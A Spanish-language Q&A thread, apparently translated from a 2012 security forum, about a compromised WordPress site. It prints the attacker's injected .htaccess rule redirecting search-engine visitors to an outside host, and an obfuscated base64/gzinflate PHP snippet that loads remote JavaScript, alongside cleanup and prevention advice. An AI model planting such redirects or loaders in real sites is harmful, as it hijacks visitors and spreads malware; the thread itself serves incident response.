¿Cómo evitar que mi sitio web reciba ataques de inyección de malware?

8

Mi sitio web fue prohibido como un sitio web de malware por Google. Cuando verifiqué el código, descubrí que un código inyectaba muchos archivos en mi servidor. Limpié todo manualmente, edité todos los archivos en mi servidor (alojamiento compartido) buscando algún código del código inyectado en todos los archivos. Incluso el archivo .htaccess fue modificado por el atacante.

Había dos instalaciones de WordPress en el sitio web, en dos subcarpetas diferentes de la raíz del sitio web, que no se actualizaron. He actualizado ambos.

Luego Google eliminó la prohibición en mi sitio web.

Ayer, descubrí que el atacante modificó de nuevo el archivo .htaccess de mi sitio web. Aquí está el código:

#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#

Busqué "b58b6f" en todos los archivos, pero no encuentro ninguno. Creo que este es el único archivo modificado por el ataque más reciente. He eliminado este archivo .htaccess, ya que no lo necesito.

¿Cómo pudo el hacker hackear mi sitio web? ¿Cómo evitar que esto vuelva a suceder? ¿Cómo puedo hacer que mi sitio web sea más seguro?

    
pregunta Debiprasad 22.06.2012 - 10:17
fuente

3 respuestas

7

Parece que el malware que encontraste es el "virus daysofyorr.com" o MW: HTA: 7 .

Le sugiero que use FileZilla como el cliente FTP. Si es así, debe saber que FileZilla almacena las credenciales de sus sitios web en texto sin formato. Es posible que un virus haya accedido a sus credenciales y luego haya accedido a todos sus sitios web registrados que buscan la instalación de WordPress para actualizar los archivos al insertar este código.

Ahora, deberías:

  • Busca en tu computadora cualquier virus, malware, etc.
  • Cambie la contraseña de FTP de todas sus cuentas de FTP registradas guardadas en FileZilla
  • Eventualmente use un mejor sistema FTP, como WinSCP
  

Un comentario tardío, pero sospecho que usas FileZilla como tu FTP   cliente. ¿Sabías que FileZilla almacena las credenciales de tu sitio FTP?   (sitio / usuario / pase) en un archivo de texto sin formato en la carpeta% APPDATA%?

     

Y también sospecho que hay un malware oculto en tu computadora. Eso   tomó sus archivos de credenciales de FileZilla y los usó para cambiar su    header.php en su carpeta de temas. De hecho, sospecho que lo harás   Encuentra el header.php cambiado en todas de tus carpetas de temas.

     

Y si usted es lo suficientemente técnico para mirar sus archivos de registro de FTP,   encontrará el acceso a esos archivos: una descarga, luego una carga de la   archivos modificados. También puede encontrar algunos nombres de archivos aleatorios que fueron   subido a su carpeta raíz ('home'), aunque esos archivos fueron   eliminado por el hacker.

     

Y, encontrará que la dirección IP en el registro de FTP del pirata informático   era de China.

     

Recomendación: desinstale FileZilla, elimine la carpeta FileZilla de   % APPDATA% de la carpeta, cambie sus contraseñas de FTP (y sus contraseñas de host).   Y busque cualquier header.php , footer.php y wp-settings.php cambiado   archivos.

Para el "virus daysofyorr.com", puede confirmarlo revisando algunos de sus archivos PHP (como index.php ), si encuentra este código:

#b58b6f#
echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
#/b58b6f#

Eso es todo!

Para información, se traduce en:

<script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>

Lo que parece llevar a un 404 hoy en día.

    
respondido por el Cyril N. 22.06.2012 - 10:37
fuente
2
  1. Verifique los registros para ver si puede resolver el punto en que se vio comprometido
  2. Asegúrese de que su Wordpress y cualquier complemento estén actualizados. Dado que Wordpress es un sistema de uso tan común, es bastante propenso a las vulnerabilidades.
  3. Si aún no puede averiguar qué ha pasado, valdría la pena ponerse en contacto con la empresa que proporciona su alojamiento compartido y avisarles del problema, ya que podría ser el resultado de una aplicación desactualizada o algo que están alojando.
respondido por el Mark Davidson 22.06.2012 - 10:28
fuente
1
  1. Si su empresa de alojamiento tiene su propia versión de wordpress que se actualizan constantemente, le recomendaría que con una nueva instalación por su cuenta VS. La probabilidad disminuiría al comprometerse, ya que lo más probable es que solo tenga acceso a través de un panel de administración.

  2. En cuanto a Filezilla, admite SFTP y FTPS, por lo que puede ser otra opción siempre que su host admita un FTP cifrado.

  3. Por último, puede bloquear rangos de IP, por ejemplo, fuera de América del Norte, lo que podría ayudar a bloquear los ataques, ya que la mayoría de los ataques son desde el extranjero para hacer que las vías legales no valgan la pena.

respondido por el Brad 22.06.2012 - 19:44
fuente

Lea otras preguntas en las etiquetas